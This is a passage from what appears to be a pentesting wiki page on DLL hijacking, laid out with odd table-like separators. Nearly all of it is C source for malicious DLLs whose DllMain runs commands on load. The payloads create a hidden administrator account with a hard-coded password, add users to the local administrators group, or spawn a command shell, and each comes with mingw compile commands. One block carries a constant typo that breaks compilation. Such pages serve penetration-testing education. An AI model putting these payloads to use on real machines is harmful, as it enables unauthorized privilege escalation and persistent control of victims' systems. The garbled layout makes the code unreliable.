		||||
case DLL_PROCESS_ATTACH:
 | 
			
		||||
system("whoami > C:\\users\\username\\whoami.txt");
 | 
			
		||||
WinExec("calc.exe", 0); //This doesn't accept redirections like system
 | 
			
		||||
break;
 | 
			
		||||
case DLL_PROCESS_DETACH:
 | 
			
		||||
break;
 | 
			
		||||
case DLL_THREAD_ATTACH:
 | 
			
		||||
break;
 | 
			
		||||
case DLL_THREAD_DETACH:
 | 
			
		||||
break;
 | 
			
		||||
}
 | 
			
		||||
return TRUE;
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
```c
 | 
			
		||||
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
 | 
			
		||||
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
 | 
			
		||||
 | 
			
		||||
#include <windows.h>
 | 
			
		||||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
 | 
			
		||||
if (dwReason == DLL_PROCESS_ATTACH){
 | 
			
		||||
system("cmd.exe /k net localgroup administrators user /add");
 | 
			
		||||
ExitProcess(0);
 | 
			
		||||
}
 | 
			
		||||
return TRUE;
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
```c
 | 
			
		||||
//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
 | 
			
		||||
//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
 | 
			
		||||
 | 
			
		||||
#include <windows.h>
 | 
			
		||||
 | 
			
		||||
int owned()
 | 
			
		||||
{
 | 
			
		||||
WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
 | 
			
		||||
exit(0);
 | 
			
		||||
return 0;
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 | 
			
		||||
{
 | 
			
		||||
owned();
 | 
			
		||||
return 0;
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
```c
 | 
			
		||||
//Another possible DLL
 | 
			
		||||
// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll
 | 
			
		||||
 | 
			
		||||
#include<windows.h>
 | 
			
		||||
#include<stdlib.h>
 | 
			
		||||
#include<stdio.h>
 | 
			
		||||
 | 
			
		||||
void Entry (){ //Default function that is executed when the DLL is loaded
 | 
			
		||||
system("cmd");
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
 | 
			
		||||
switch (ul_reason_for_call){
 | 
			
		||||
case DLL_PROCESS_ATTACH:
 | 
			
		||||
CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
 | 
			
		||||
break;
 | 
			
		||||
case DLL_THREAD_ATTACH:
 | 
			
		||||
case DLL_THREAD_DETACH:
 | 
			
		||||
case DLL_PROCESS_DEATCH:
 | 
			
		||||
break;
 | 
			
		||||
}
 | 
			
		||||
return TRUE;
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
## Marejeo
 | 
			
		||||
 | 
			
		||||
- [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
 | 
			
		||||
- [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
- [Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe](https://research.checkpoint.com/2025/nimbus-manticore-deploys-new-malware-targeting-europe/)
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
{{#include ../../banners/hacktricks-training.md}}
 | 
			
		||||